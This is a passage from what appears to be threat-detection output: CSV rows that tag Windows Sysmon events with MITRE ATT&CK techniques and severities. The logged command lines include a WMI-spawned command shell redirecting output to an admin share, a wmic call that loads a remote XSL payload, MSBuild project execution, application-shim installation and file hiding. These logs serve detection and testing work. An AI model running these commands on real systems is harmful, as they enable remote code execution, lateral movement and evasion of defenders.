<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,Low,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.436954Z"">
</TimeCreated>
<EventRecordID>421218</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.428</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-00109EB23300</Data>
<Data Name=""ProcessId"">2628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.436954Z"">
</TimeCreated>
<EventRecordID>421218</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.428</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-00109EB23300</Data>
<Data Name=""ProcessId"">2628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Instances of an Active Script Event Consumer - Process,1602975185.625304,2020-10-18T02:53:05.625304+04:00,,Threat,High,Found User (MSEDGEWIN10\Administrator) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1 ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-10-17T22:53:05.436954Z"">
</TimeCreated>
<EventRecordID>421218</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3236"" ThreadID=""4832"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-10-17 22:53:05.428</Data>
<Data Name=""ProcessGuid"">747F3D96-75D1-5F8B-0000-00109EB23300</Data>
<Data Name=""ProcessId"">2628</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">cmd.exe /Q /c cd \ 1&gt; \\127.0.0.1\C$\WqEVwJZYOe 2&gt;&amp;1</Data>
<Data Name=""CurrentDirectory"">C:\</Data>
<Data Name=""User"">MSEDGEWIN10\Administrator</Data>
<Data Name=""LogonGuid"">747F3D96-75D0-5F8B-0000-0020A8A83300</Data>
<Data Name=""LogonId"">0x33a8a8</Data>
<Data Name=""TerminalSessionId"">0</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-75D1-5F8B-0000-00101DAB3300</Data>
<Data Name=""ParentProcessId"">2228</Data>
<Data Name=""ParentImage"">C:\Windows\System32\wbem\WmiPrvSE.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:53.776441Z"">
</TimeCreated>
<EventRecordID>4939</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:53.759</Data>
<Data Name=""ProcessGuid"">747F3D96-6641-5D3F-0000-0010A38C8A00</Data>
<Data Name=""ProcessId"">4260</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1047] Windows Management Instrumentation - Process,1564436033.843592,2019-07-30T01:33:53.843592+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:53.776441Z"">
</TimeCreated>
<EventRecordID>4939</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:53.759</Data>
<Data Name=""ProcessGuid"">747F3D96-6641-5D3F-0000-0010A38C8A00</Data>
<Data Name=""ProcessId"">4260</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c wmic process get brief /format:&quot;https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl&quot;</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1594332045.590448,2020-07-10T02:00:45.590448+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( &quot;C:\Windows\system32\cmd.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2020-07-09T22:00:45.589922Z"">
</TimeCreated>
<EventRecordID>311365</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""3280"" ThreadID=""1044"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2020-07-09 22:00:45.576</Data>
<Data Name=""ProcessGuid"">747F3D96-938D-5F07-0000-001043A84500</Data>
<Data Name=""ProcessId"">7976</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.592 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""OriginalFileName"">Cmd.Exe</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
<Data Name=""CurrentDirectory"">C:\Users\IEUser\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-86FA-5F07-0000-00204A8B0600</Data>
<Data Name=""LogonId"">0x68b4a</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">Medium</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-86FC-5F07-0000-00101E4B0700</Data>
<Data Name=""ParentProcessId"">2356</Data>
<Data Name=""ParentImage"">C:\Windows\explorer.exe</Data>
<Data Name=""ParentCommandLine"">C:\Windows\Explorer.EXE</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1059] Command-Line Interface,1564436029.889688,2019-07-30T01:33:49.889688+04:00,,Threat,Low,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\cmd.exe ) through command line ( cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:49.748805Z"">
</TimeCreated>
<EventRecordID>4936</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-07-29 21:33:49.535</Data>
<Data Name=""ProcessGuid"">747F3D96-663D-5D3F-0000-00106F608A00</Data>
<Data Name=""ProcessId"">3240</Data>
<Data Name=""Image"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""FileVersion"">10.0.17763.1 (WinBuild.160101.0800)</Data>
<Data Name=""Description"">Windows Command Processor</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj</Data>
<Data Name=""CurrentDirectory"">C:\Windows\system32\</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""LogonGuid"">747F3D96-6053-5D3F-0000-002082314100</Data>
<Data Name=""LogonId"">0x413182</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=8C5437CD76A89EC983E3B364E219944DA3DAB464,MD5=975B45B669930B0CC773EAF2B414206F,SHA256=3656F37A1C6951EC4496FABB8EE957D3A6E3C276D5A3785476B482C9C0D32EA2,IMPHASH=272245E2988E1E430500B852C4FB5E18</Data>
<Data Name=""ParentProcessGuid"">747F3D96-6609-5D3F-0000-00109FBF8500</Data>
<Data Name=""ParentProcessId"">1208</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\System32\cmd.exe&quot; /C &quot;C:\ProgramData\ssh\runtests.bat&quot; </Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1138] Application Shimming - process,1553028513.920273,2019-03-20T00:48:33.920273+04:00,,Threat,High,"[T1138] Application Shimming - process , please check raw log",1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-03-19T20:48:33.870201Z"">
</TimeCreated>
<EventRecordID>1966382</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1564"" ThreadID=""1252"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>PC01.example.corp</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName""></Data>
<Data Name=""UtcTime"">2019-03-19 20:48:33.639</Data>
<Data Name=""ProcessGuid"">365ABB72-55A1-5C91-0000-0010D6960700</Data>
<Data Name=""ProcessId"">2368</Data>
<Data Name=""Image"">C:\Windows\System32\sdbinst.exe</Data>
<Data Name=""FileVersion"">6.0.7600.16385 (win7_rtm.090713-1255)</Data>
<Data Name=""Description"">Application Compatibility Database Installer</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">&quot;C:\Windows\system32\sdbinst.exe&quot; -q -u &quot;C:\Windows\AppPatch\Test.SDB &quot; </Data>
<Data Name=""CurrentDirectory"">C:\Windows\System32\</Data>
<Data Name=""User"">EXAMPLE\user01</Data>
<Data Name=""LogonGuid"">365ABB72-5417-5C91-0000-002035340300</Data>
<Data Name=""LogonId"">0x33435</Data>
<Data Name=""TerminalSessionId"">1</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">MD5=2996B3E7BBA42BEA62D386D9386EDE97,IMPHASH=87CBEAE39ADA9E96C7F27B94962CD83F</Data>
<Data Name=""ParentProcessGuid"">365ABB72-551C-5C91-0000-001030590500</Data>
<Data Name=""ParentProcessId"">2704</Data>
<Data Name=""ParentImage"">C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Program Files\Microsoft Application Compatibility Toolkit\Compatibility Administrator (32-bit)\Compatadmin.exe&quot; </Data>
</EventData>
</Event>",PC01.example.corp,Microsoft-Windows-Sysmon/Operational
[T1158] Hidden Files and Directories,-11644473600.0,1601-01-01T04:00:00+04:00,,Threat,High,Found User (insecurebank\Administrator) running image ( C:\Windows\System32\attrib.exe ) through command line ( attrib +h nbtscan.exe ) accessing hidden files and directories,1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-05-19T17:32:00.482982Z"">
</TimeCreated>
<EventRecordID>22013</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""1768"" ThreadID=""2272"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>DC1.insecurebank.local</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">technique_id=T1158,technique_name=Hidden Files and DirectoriesHidden Files and Directories</Data>
<Data Name=""UtcTime"">2019-05-19 17:32:00.478</Data>
<Data Name=""ProcessGuid"">DFAE8213-9310-5CE1-0000-0010EABA0A00</Data>
<Data Name=""ProcessId"">2728</Data>
<Data Name=""Image"">C:\Windows\System32\attrib.exe</Data>
<Data Name=""FileVersion"">6.3.9600.16384 (winblue_rtm.130821-1623)</Data>
<Data Name=""Description"">Attribute Utility</Data>
<Data Name=""Product"">Microsoft® Windows® Operating System</Data>
<Data Name=""Company"">Microsoft Corporation</Data>
<Data Name=""CommandLine"">attrib +h nbtscan.exe</Data>
<Data Name=""CurrentDirectory"">c:\ProgramData\</Data>
<Data Name=""User"">insecurebank\Administrator</Data>
<Data Name=""LogonGuid"">DFAE8213-9133-5CE1-0000-0020CC660500</Data>
<Data Name=""LogonId"">0x566cc</Data>
<Data Name=""TerminalSessionId"">2</Data>
<Data Name=""IntegrityLevel"">High</Data>
<Data Name=""Hashes"">SHA1=B71C1331AC5FA214076E5CD5C885712447057B96,MD5=116D463D2F5DBF76F7E2F5C6D8B5D3BB,SHA256=EBE94E294D86C714BED13EF018E70F75C37F8D8259144C0C847637EDC0222ECB,IMPHASH=461A33302E82ED68F1A74C083E27BD02</Data>
<Data Name=""ParentProcessGuid"">DFAE8213-91CC-5CE1-0000-0010BEF40600</Data>
<Data Name=""ParentProcessId"">3408</Data>
<Data Name=""ParentImage"">C:\Windows\System32\cmd.exe</Data>
<Data Name=""ParentCommandLine"">&quot;C:\Windows\system32\cmd.exe&quot; </Data>
</EventData>
</Event>",DC1.insecurebank.local,Microsoft-Windows-Sysmon/Operational
Prohibited Process connecting to internet,1564436029.340889,2019-07-30T01:33:49.340889+04:00,,Threat,Critical,"User (MSEDGEWIN10\IEUser) run process C:\Windows\System32\regsvr32.exe and initiated network connection from hostname ( MSEDGEWIN10.home and IP ( 10.0.2.15 ) to hostname ( ) , IP ( 151.101.0.133 ) and port ( 443 )",3,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>3</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>3</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:46.095763Z"">
</TimeCreated>
<EventRecordID>4934</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3496"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
<Computer>MSEDGEWIN10</Computer>
<Security UserID=""S-1-5-18"">
</Security>
</System>
<EventData>
<Data Name=""RuleName"">Suspicious NetCon</Data>
<Data Name=""UtcTime"">2019-07-29 21:33:44.949</Data>
<Data Name=""ProcessGuid"">747F3D96-6638-5D3F-0000-001067BA8900</Data>
<Data Name=""ProcessId"">4288</Data>
<Data Name=""Image"">C:\Windows\System32\regsvr32.exe</Data>
<Data Name=""User"">MSEDGEWIN10\IEUser</Data>
<Data Name=""Protocol"">tcp</Data>
<Data Name=""Initiated"">true</Data>
<Data Name=""SourceIsIpv6"">false</Data>
<Data Name=""SourceIp"">10.0.2.15</Data>
<Data Name=""SourceHostname"">MSEDGEWIN10.home</Data>
<Data Name=""SourcePort"">49829</Data>
<Data Name=""SourcePortName""></Data>
<Data Name=""DestinationIsIpv6"">false</Data>
<Data Name=""DestinationIp"">151.101.0.133</Data>
<Data Name=""DestinationHostname""></Data>
<Data Name=""DestinationPort"">443</Data>
<Data Name=""DestinationPortName"">https</Data>
</EventData>
</Event>",MSEDGEWIN10,Microsoft-Windows-Sysmon/Operational
[T1117] Regsvr32,1564436026.095763,2019-07-30T01:33:46.095763+04:00,,Threat,High,Found User (MSEDGEWIN10\IEUser) running image ( C:\Windows\System32\calc.exe ) through command line ( &quot;C:\Windows\System32\calc.exe&quot; ),1,"<?xml version=""1.0"" encoding=""utf-8""?>
<Event xmlns=""http://schemas.microsoft.com/win/2004/08/events/event"">
<System>
<Provider Name=""Microsoft-Windows-Sysmon"" Guid=""5770385F-C22A-43E0-BF4C-06F5698FFBD9"">
</Provider>
<EventID>1</EventID>
<Version>5</Version>
<Level>4</Level>
<Task>1</Task>
<Opcode>0</Opcode>
<Keywords>0x8000000000000000</Keywords>
<TimeCreated SystemTime=""2019-07-29T21:33:45.581170Z"">
</TimeCreated>
<EventRecordID>4933</EventRecordID>
<Correlation>
</Correlation>
<Execution ProcessID=""2640"" ThreadID=""3476"">
</Execution>
<Channel>Microsoft-Windows-Sysmon/Operational</Channel>
